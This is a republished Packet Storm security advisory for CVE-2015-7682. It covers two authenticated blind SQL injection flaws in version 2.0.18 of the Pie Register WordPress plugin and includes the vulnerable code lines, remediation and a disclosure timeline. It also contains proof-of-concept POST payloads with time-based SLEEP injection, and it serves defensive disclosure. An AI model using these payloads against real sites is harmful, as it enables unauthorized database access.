Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormDavid MoorePACKETSTORM:133929
HistoryOct 12, 2015 - 12:00 a.m.

WordPress Pie Register 2.0.18 SQL Injection

2015-10-1200:00:00
David Moore
packetstormsecurity.com
21

0.002 Low

EPSS

Percentile

60.6%

JSON
`  
Details  
================  
Software: Pie Register  
Version: 2.0.18  
Homepage: https://github.com/GTSolutions/Pie-Register  
CVE: CVE-2015-7682 (Pending)  
CVSS: 3.5 (Low; AV:N/AC:M/Au:S/C:P/I:N/A:N)  
CWE: CWE-89  
  
Description  
================  
Two blind SQL injection vulnerabilities in Pie Register 2.0.18 allow SQL injection by admins leading to loss of database confidentiality. Pie Register is a WordPress plugin with over 10,000 active installs.  
  
Vulnerabilities  
================  
The vulnerabilities are due to the unsanitized POST parameters invitaion_code_bulk_option and invi_del_id:  
  
Injection 1:  
>From pie-register/pie-register.php:  
576: $this->delete_invitation_codes($_POST['select_invitaion_code_bulk_option']);  
. . .  
3521: $sql = "DELETE FROM `$codetable` WHERE `id` IN ( ".$ids." )";  
  
Injection 2:  
>From pie-register/pie-register.php:  
1941: if($wpdb->query("DELETE FROM ".$codetable." WHERE id = ".$_POST['invi_del_id']))  
  
Proof of concept  
================  
URL: http://localhost/wordpress/wp-admin/admin.php?page=pie-invitation-codes  
  
Injection 1:  
POST data:  
select_invitaion_code_bulk_option=1)%20OR%20SLEEP(15)%3d0%20LIMIT%201--&invitaion_code_bulk_option=delete&btn_submit_invitaion_code_bulk_option=Apply  
  
Injection 2:  
POST data:  
piereg_invitation_nonce=66e7e6383d&_wp_http_referer=%2Fwordpress%2Fwp-admin%2Fadmin.php%3Fpage%3Dpie-invitation-codes&invi_del_id=1%20OR%20SLEEP(15)%3d0%20LIMIT%201--  
  
Remediation  
================  
Upgrade the plugin to version 2.0.19 or higher.  
  
Timeline  
================  
2015-09-23: Discovered  
2015-09-24: Contacted vendor via website support form  
2015-09-28: Vendor supplied security contact email  
2015-09-28: Requested CVE  
2015-09-30: Report sent to vendor and wordpress.org  
2015-10-02: Vendor releases version 2.0.19 on Github - confirmed fixed  
2015-10-12: Public Disclosure  
  
References  
================  
[1] http://codex.wordpress.org/Class_Reference/wpdb#Protect_Queries_Against_SQL_Injection_Attacks  
  
Discovered by  
================  
David Moore @grajagandev  
  
`

Related

securityvulns 2
prion 1
wpvulndb 1
patchstack 1
cvelist 1
cve 1
zdt 1
securityvulns
securityvulns
CVE-2015-7682: Multiple Blind SQL Injections in Pie Register WordPress Plugin
2015-10-26 00:00:00
Web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)
2015-10-26 00:00:00
prion
prion
Sql injection
2015-10-16 20:59:00
wpvulndb
wpvulndb
Pie-Register <= 2.0.18 - Authenticated Blind SQL Injection
2015-10-12 00:00:00
patchstack
patchstack
WordPress Pie Register Plugin <= 2.0.18 - Multiple SQL Injection
2015-10-02 00:00:00
cvelist
cvelist
CVE-2015-7682
2015-10-16 20:00:00
cve
cve
CVE-2015-7682
2015-10-16 20:59:00
zdt
zdt
WordPress Pie Register 2.0.18 Cross Site Scripting / SQL Injection Vulnerabilities
2015-10-13 00:00:00

0.002 Low

EPSS

Percentile

60.6%

JSON
Related for PACKETSTORM:133929
securityvulns2prion1wpvulndb1patchstack1cvelist1cve1zdt1